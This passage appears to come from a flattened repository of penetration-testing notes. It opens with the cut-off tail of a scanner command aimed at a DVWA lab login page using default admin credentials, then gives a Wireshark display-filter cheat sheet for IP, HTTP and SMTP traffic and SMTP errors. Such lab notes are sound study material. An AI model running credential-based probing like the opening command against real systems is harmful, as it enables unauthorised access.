http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v 49 | -------------------------------------------------------------------------------- /wireshark: -------------------------------------------------------------------------------- 1 | Wireshark Filters: 2 | 3 | 4 | Filtering traffic from one server: 5 | 6 | ip.addr eq 7 | 8 | Filtering traffic between two servers: 9 | 10 | ip.addr eq and ip.addr eq 11 | 12 | Filtering traffic of standard protocols: 13 | 14 | smtp 15 | 16 | ldap 17 | 18 | ssl 19 | 20 | http 21 | 22 | dns 23 | 24 | Filtering an SMTP conversation between two servers: 25 | 26 | ip.addr eq and ip.addr eq and smtp 27 | 28 | Filtering an HTTP conversation between two servers: 29 | 30 | ip.addr eq and ip.addr eq and http 31 | 32 | Filtering an SMTP Conversation with TLS between two servers: 33 | 34 | ip.addr eq and ip.addr eq and ssl 35 | 36 | Filtering outgoing packets from ona particular IP: 37 | 38 | ip.src eq 39 | 40 | Filtering incoming packets from one particular IP: 41 | 42 | ip.dst eq 43 | 44 | Filtering the number of SMTP sessions: 45 | 46 | smtp.req.command eq QUIT 47 | 48 | Filtering the number of transmited mails: 49 | 50 | smtp.req.command eq MAIL 51 | 52 | Filtering the number of recipients in an SMTP conversation: 53 | 54 | smtp.req.command eq RCPT 55 | 56 | Filtering a specific recipient mailbox: 57 | 58 | smtp.req.command eq RCPT and smtp.req.parameter contains “user@domain.com” 59 | 60 | Filtering a specific sender mailbox: 61 | 62 | smtp.req.command eq MAIL and smtp.req.parameter conatains “user@domain.com” 63 | 64 | Filtering SMTP errors: 65 | 66 | If you know the error code then use this filter: 67 | 68 | smtp.response.code eq 69 | 70 | for example: smtp.response.code eq 421 71 | 72 | If you don’t know it, or if you want to list all SMTP errors in the SMTP sessions, then you must first exclude all the valid codes (2XX) until you end up only with 4XX or 5XX codes. 73 | 74 | not smtp.response.code eq 220 and not smtp.response.code eq 221 and not smtp.response.code eq 250 and not smtp.response.code eq 354 and smtp.response.code 75 | 76 | When you execute this filter you will end up only with 4XX and/or 5XX error codes so you will see all SMTP errors withing your capture. If it ends up blank, it means that no SMTP errors were found in that specific capture. 77 | 78 | =========================================================================================================================== 79 | --------------------------------------------------------------------------------